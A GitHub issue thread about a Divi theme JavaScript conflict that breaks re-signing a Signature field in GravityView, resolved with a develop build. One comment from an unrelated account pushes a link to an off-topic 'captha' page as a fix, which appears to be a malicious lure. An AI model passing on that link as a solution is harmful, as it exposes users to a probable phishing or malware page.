### ISSUE TITLE
Impossible to edit Signature add-on field on Edit Entry  page because of Divi

### ISSUE THREAD

**Issue by rafaehlers** [GravityKit/GravityView#2173]
This JavaScript error only happens when using Divi as the active theme.

> `Uncaught SyntaxError: Identifier '$' has already been declared`

![image](https://github.com/user-attachments/assets/ab1a3226-12e2-48e9-bf6b-3f2432162258)

## What's happening:
Because of this error, it's impossible to sign again when clicking on the "Sign again." link below the signature image.

![divi](https://github.com/user-attachments/assets/185d0eb1-9d18-42bc-841f-347ee41d56b4)

## What should happen:
The field allows the user to sign on it again.

![2024-10-16 18-15-11](https://github.com/user-attachments/assets/aeb04f16-7a30-49cc-8ee6-d0072646590e)

Link to test: https://divi.try.gravitykit.com/view/signature-add-on/ 
Admin access on InstaWP's dashboard
[gk-migrate-divi.try.gravitykit.com-2024-10-16-1729113567.zip](https://github.com/user-attachments/files/17402909/gk-migrate-divi.try.gravitykit.com-2024-10-16-1729113567.zip) >> When using GravityMigrate beware of this: https://github.com/GravityKit/GravityMigrate/issues/80

Tested with GV 2.30.1 (and 2.29), GFs 2.8.18, Signature add-on 4.6.0, and Divi 4.27.2

**Comment by rafaehlers** [comment]
https://secure.helpscout.net/conversation/2731146271/57935

**Comment by zackkatz** [comment]
This may be resolved by using `jQuery.noConflict()`.

**Comment by rafaehlers** [comment]
I sent a build of the `develop` branch to the customer.

**Comment by thegamerjedbest45454** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by bennemann** [comment]
The customer confirmed it's working.
